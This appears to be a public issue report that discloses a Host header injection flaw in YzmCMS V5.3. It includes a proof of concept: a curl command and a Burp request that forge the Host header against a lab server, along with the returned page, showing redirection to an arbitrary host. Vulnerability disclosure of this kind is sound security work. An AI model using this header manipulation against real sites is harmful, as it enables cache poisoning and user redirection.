Open
Description
Host header injection vulnerability found on YzmCMS V5.3, Using this attack, a malicious user can poison the web cache or arbitrary user re-direction.
PoC:
Test Environment: Windows 7 SP1(64bit)
XAMPP: 7.3.9
YzmCMS V5.3 Access Path: 192.168.30.169/yzmcms/
root@kali:~# curl http://192.168.30.169/yzmcms/member/ -H "Host: www.google.com"
<title>YzmCMS提示信息</title> <style type="text/css"> *{padding:0;margin:0;} body{background:#fff;color:#000;font-family:"Microsoft Yahei","Hiragino Sans GB","Helvetica Neue",Helvetica,tahoma,arial,"WenQuanYi Micro Hei",Verdana,sans-serif;} #msg{border:1px solid #5eb95e;width:500px;position:absolute;top:44%;left:50%;margin:-87px 0 0 -250px;padding:1px;line-height:30px;text-align:center;font-size:16px;background:#fff;} #msgtit{height:35px;line-height:35px;color:#fff;background:#5eb95e;} #msgbody{margin:20px 0;text-align:center} #info{margin-bottom:10px;} #msgbody p{font-size:14px;} #msgbody p a{font-size:14px;color:#333;text-decoration:none;} #msgbody p a:hover{color:#5a98de;} </style>提示信息
请先登录!
本页面将在1秒后跳转...
Or if we capture this in burp:
GET /yzmcms/member/ HTTP/1.1
Host: 192.168.30.169

Next change the "Host" to www.google.com and "Go" for web request:

This will be re-directed to www.google.com with 404 responds.
Capture the responds and open the browser will show following:

This is detected & email to you on 18-Sep-2019, but no responds. So provide information in here. Thank you.
Metadata
Metadata
Assignees
Labels
No labels

